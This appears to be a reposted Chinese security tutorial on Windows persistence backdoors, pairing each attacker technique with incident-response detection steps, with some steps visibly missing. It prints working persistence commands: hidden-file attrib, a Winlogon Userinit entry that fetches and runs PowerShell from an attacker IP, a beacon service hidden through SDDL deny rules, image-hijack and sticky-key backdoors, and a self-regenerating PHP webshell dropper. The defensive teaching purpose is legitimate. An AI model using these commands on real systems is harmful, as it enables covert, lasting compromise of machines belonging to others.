一、基本介绍
红队攻击者在对目标进行渗透利用后通常都会进行权限维持,以达到持续利用的目的。而作为防方进行应急响应时,应该如何与技术高超(jiaohuajianzha)的攻击者斗智斗勇呢?或许可以通过本文可以找到答案。以下内容不仅可以助力你拿捏应急响应,也能够让你在红蓝对抗中更胜一筹。篇幅有限只能先写一下Windows系统的应急响应。
二、维持应急
(一)Windows隐藏维持
1.维持方法:通过输入以下命令进行隐藏后门木马文件
Attrib +s +a +h +r 【文件名】3.应急查找:通过输入以下命令来见招拆招查找隐藏后门
Attrib -s -a -h -r *.exe*(二)影子账号维持
(三)克隆账号维持
1.维持方法:
a.使用第二条中的创建影子的方式创建一个影子账号,然后再Win+R→regedit进入注册表。
3.应急查找:为什么刚才要将创建过程写这么详细,就是为了我们去寻找。我们可以同样来到注册表HEKY_LOCAL_MACHINE\SAM\SAM中,然后查找有没有跟000001F4(超级管理员账号)的F值一样的账号即是克隆账号
(四)组策略脚本维持
3.应急查找:在应急响应的时候,为什么总有木马能够悄悄启动运行,可能就是因为这个组策略中设置了启动后门脚本。可以使用win+R→gpedit.msc进行查找,或win+R→msconfig查看启动项
(五)粘滞键后门维持
1.维持方法:
a.进入到`C:\Windows\System32`找到**sethc.exe**文件
tasklist | findstr "setch.exe"tasklist | findstr "Magnify.exe"
(六)Winlogon无落地文件维持
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe,***************"b.然后继续在Powershell中输入以下命令来达到无文件落地就能执行后门效果,192.168.1.131为攻击机IP
Set-ItemProperty "HKLM:\SOFTWARE\Microsoft\WINDOWS NT\CurrentVersion\Winlogon" -name Userinit -value "C:\Windows\system32\userinit.exe, powershell.exe -nop -w hidden -c \"IEX ((new-object net.webclient).downloadstring('http://192.168.1.131/a'))\""3.应急查找:仔细检查以下的注册表中的键值是否存在可以的程序
HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\(七)映像劫持维持
a.Win+R→regedit进入注册表,找到以下目录下
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsNT\CurrentVersion\Image File Execution Optionsb.在该文件下新建一个比较有迷惑性的项(如原本就已经安装的常用软件)
c.然后在新建的项里面添加一个Debugger,并将其值修改为后门木马的绝对路径
a.仔细检查注册表中以下路径中的程序名称及键值,查看其键值是否指向其对应名称的文件。
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Option(八)SDDL隐藏维持
a.输入win+R→cmd进入DOS界面后输入以下命令进行创建自启动服务,并启动该服务
sc create ".NET CLR Networking 3.5.0.0" binpath= "cmd.exe /k C:\Users\administrator\beacon.exe" depend= Tcpip obj= Localsystem start= autob.此时可以通过sc query、Get-Service、services.msc方式进行查看到该服务器
c.所以可通过修改SDDL来隐藏服务
sc sdset ".NET CLR Networking 3.5.0.0" "D:(D;;DCLCWPDTSD;;;IU) (D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU) (A;;CCLCSWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY) (A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"g.在被攻击主机中输入如下命令来执行刚才生成的1.ps1文件。192.168.1.138为kali的IP
powershell.exe -exec bypass -nop -w hidden -c "IEX((new-object net.webclient).downloadstring('http://192.168.1.138/1.ps1'));Server-Sddl-Change -Name '.NET CLR Networking 3.5.0.0'"2.维持效果:重启启动靶机后可以看到已经在注册表中完全隐藏了该项服务
a.可以使用Wireshark进行流量抓包,通过查看进出流量判断恶意连接软件的存在
b. 如果对方使用了以下的拒绝语句来隐藏,则可以使用以下语句来删除拒绝相关的SDDL语句,从而能够正常查询该后门
& $env:SystemRoot\System32\sc.exe sdset ".NET CLR Networking 3.5.0.0" "D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)"(九)PHP不死马后门维持
1.维持方法:使用如下不死马php持续不断生成木马文件
<?phpignore_user_abort(); //关掉浏览器,PHP脚本也可以继续执行.set_time_limit(0); //通过set_time_limit(0)可以让程序无限制的执行下去$interval = 5; // 每隔*秒运行do {$filename = 'test.php';if(file_exists($filename)) {echo "xxx";}else {$file = fopen("test.php", "w"); //修改此行可以改变生成的木马文件名$txt = "<?php phpinfo();?>\n"; //此行为写入的木马文件内容,可根据需要进行修改fwrite($file, $txt);fclose($file);}sleep($interval);} while (true);?>
c.可以使用everything中的dm语法,根据文件生成时间来查找该不死马和生成的木马文件
(十)IIS后门权限维持
3.应急查找:
a.关闭Web服务程序,然后对Web目录进行查找
dm:【时间】.dll三、推荐工具
1.Everything:文件查找,可以按照建立时间全盘快速寻找到文件从而方便查找到隐藏的木马文件
3.火绒剑:进程分析,可以直接分析运行进程和子进程,以及其对应的启动文件
作者:asways,文章转载于FreeBuf.COM
如有侵权,请联系删除
推荐阅读
查看更多精彩内容,还请关注橘猫学安全:
如有侵权请联系:admin#unsafe.sh